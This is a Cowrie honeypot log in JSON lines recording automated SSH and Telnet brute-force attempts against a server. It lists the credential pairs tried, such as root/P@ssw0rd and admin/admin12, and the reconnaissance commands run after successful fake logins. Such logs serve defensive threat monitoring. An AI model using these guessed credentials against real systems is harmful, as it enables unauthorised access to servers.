{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:31:01.860148Z","src_ip":"212.227.235.229","session":"f8fb0f47151e"}
{"eventid":"cowrie.login.success","username":"root","password":"Root","message":"login attempt [root/Root] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:31:06.219498Z","src_ip":"212.227.235.229","session":"f8fb0f47151e"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:31:07.023057Z","src_ip":"212.227.235.229","session":"f8fb0f47151e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35346,"dst_ip":"1.2.3.4","dst_port":22,"session":"215c62acf96f","protocol":"ssh","message":"New connection: 212.227.125.160:35346 (1.2.3.4:22) [session: 215c62acf96f]","sensor":"my-vps","timestamp":"2025-08-26T21:31:19.585866Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:31:19.647008Z","src_ip":"212.227.125.160","session":"215c62acf96f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42096,"dst_ip":"1.2.3.4","dst_port":23,"session":"97446b18a62c","protocol":"telnet","message":"New connection: 212.227.125.160:42096 (1.2.3.4:23) [session: 97446b18a62c]","sensor":"my-vps","timestamp":"2025-08-26T21:31:22.647982Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52752,"dst_ip":"1.2.3.4","dst_port":22,"session":"e38d04a997e6","protocol":"ssh","message":"New connection: 212.227.235.229:52752 (1.2.3.4:22) [session: e38d04a997e6]","sensor":"my-vps","timestamp":"2025-08-26T21:31:35.804476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:31:36.565298Z","src_ip":"212.227.235.229","session":"e38d04a997e6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:31:36.566165Z","src_ip":"212.227.235.229","session":"e38d04a997e6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin12","message":"login attempt [admin/admin12] failed","sensor":"my-vps","timestamp":"2025-08-26T21:31:40.848403Z","src_ip":"212.227.235.229","session":"e38d04a997e6"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:31:42.805583Z","src_ip":"212.227.235.229","session":"e38d04a997e6"}
{"eventid":"cowrie.session.closed","duration":31.486015796661377,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:31:54.133925Z","src_ip":"212.227.125.160","session":"97446b18a62c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58844,"dst_ip":"1.2.3.4","dst_port":22,"session":"842554abf00e","protocol":"ssh","message":"New connection: 212.227.125.160:58844 (1.2.3.4:22) [session: 842554abf00e]","sensor":"my-vps","timestamp":"2025-08-26T21:32:41.102119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:32:41.145810Z","src_ip":"212.227.125.160","session":"842554abf00e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:32:41.180741Z","src_ip":"212.227.125.160","session":"842554abf00e"}
{"eventid":"cowrie.login.failed","username":"fastuser","password":"fastuser","message":"login attempt [fastuser/fastuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:32:41.364173Z","src_ip":"212.227.125.160","session":"842554abf00e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:32:42.433530Z","src_ip":"212.227.125.160","session":"842554abf00e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54228,"dst_ip":"1.2.3.4","dst_port":22,"session":"80f9b6f493ac","protocol":"ssh","message":"New connection: 212.227.125.160:54228 (1.2.3.4:22) [session: 80f9b6f493ac]","sensor":"my-vps","timestamp":"2025-08-26T21:32:48.531049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:32:48.552044Z","src_ip":"212.227.125.160","session":"80f9b6f493ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:32:48.596204Z","src_ip":"212.227.125.160","session":"80f9b6f493ac"}
{"eventid":"cowrie.login.failed","username":"super","password":"super","message":"login attempt [super/super] failed","sensor":"my-vps","timestamp":"2025-08-26T21:32:48.853089Z","src_ip":"212.227.125.160","session":"80f9b6f493ac"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:32:49.915781Z","src_ip":"212.227.125.160","session":"80f9b6f493ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49616,"dst_ip":"1.2.3.4","dst_port":22,"session":"da4258e429c4","protocol":"ssh","message":"New connection: 212.227.125.160:49616 (1.2.3.4:22) [session: da4258e429c4]","sensor":"my-vps","timestamp":"2025-08-26T21:32:54.832303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:32:54.833074Z","src_ip":"212.227.125.160","session":"da4258e429c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:32:55.220453Z","src_ip":"212.227.125.160","session":"da4258e429c4"}
{"eventid":"cowrie.login.failed","username":"registry","password":"registry","message":"login attempt [registry/registry] failed","sensor":"my-vps","timestamp":"2025-08-26T21:32:55.453148Z","src_ip":"212.227.125.160","session":"da4258e429c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":12544,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2a06791dd78","protocol":"ssh","message":"New connection: 213.108.243.7:12544 (1.2.3.4:22) [session: f2a06791dd78]","sensor":"my-vps","timestamp":"2025-08-26T21:32:55.642429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:32:55.643092Z","src_ip":"213.108.243.7","session":"f2a06791dd78"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:32:55.744197Z","src_ip":"213.108.243.7","session":"f2a06791dd78"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r%T","message":"login attempt [root/!Q2w#E4r%T] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:32:56.055642Z","src_ip":"213.108.243.7","session":"f2a06791dd78"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:32:56.277026Z","src_ip":"213.108.243.7","session":"f2a06791dd78"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T21:32:56.277791Z","src_ip":"213.108.243.7","session":"f2a06791dd78"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:32:56.387531Z","src_ip":"213.108.243.7","session":"f2a06791dd78"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:32:56.388590Z","src_ip":"213.108.243.7","session":"f2a06791dd78"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:32:57.079391Z","src_ip":"212.227.125.160","session":"da4258e429c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45002,"dst_ip":"1.2.3.4","dst_port":22,"session":"977f1fde6107","protocol":"ssh","message":"New connection: 212.227.125.160:45002 (1.2.3.4:22) [session: 977f1fde6107]","sensor":"my-vps","timestamp":"2025-08-26T21:33:00.828715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:00.876221Z","src_ip":"212.227.125.160","session":"977f1fde6107"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:01.348962Z","src_ip":"212.227.125.160","session":"977f1fde6107"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-26T21:33:01.803570Z","src_ip":"212.227.125.160","session":"977f1fde6107"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:02.849023Z","src_ip":"212.227.125.160","session":"977f1fde6107"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40388,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a9971a7ab09","protocol":"ssh","message":"New connection: 212.227.125.160:40388 (1.2.3.4:22) [session: 9a9971a7ab09]","sensor":"my-vps","timestamp":"2025-08-26T21:33:07.369979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:07.410651Z","src_ip":"212.227.125.160","session":"9a9971a7ab09"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:07.477193Z","src_ip":"212.227.125.160","session":"9a9971a7ab09"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:33:08.990311Z","src_ip":"212.227.125.160","session":"9a9971a7ab09"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:33:09.602265Z","src_ip":"212.227.125.160","session":"9a9971a7ab09"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:33:09.603016Z","src_ip":"212.227.125.160","session":"9a9971a7ab09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:09.692439Z","src_ip":"212.227.125.160","session":"9a9971a7ab09"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:09.693573Z","src_ip":"212.227.125.160","session":"9a9971a7ab09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35772,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc3bd5777748","protocol":"ssh","message":"New connection: 212.227.125.160:35772 (1.2.3.4:22) [session: cc3bd5777748]","sensor":"my-vps","timestamp":"2025-08-26T21:33:13.600860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:33:13.619131Z","src_ip":"212.227.125.160","session":"cc3bd5777748"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:33:13.658524Z","src_ip":"212.227.125.160","session":"cc3bd5777748"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"lsfadmin","message":"login attempt [lsfadmin/lsfadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:33:13.885532Z","src_ip":"212.227.125.160","session":"cc3bd5777748"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:33:15.029494Z","src_ip":"212.227.125.160","session":"cc3bd5777748"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59392,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc67bb285d02","protocol":"ssh","message":"New connection: 212.227.125.160:59392 (1.2.3.4:22) [session: fc67bb285d02]","sensor":"my-vps","timestamp":"2025-08-26T21:33:19.381732Z"}
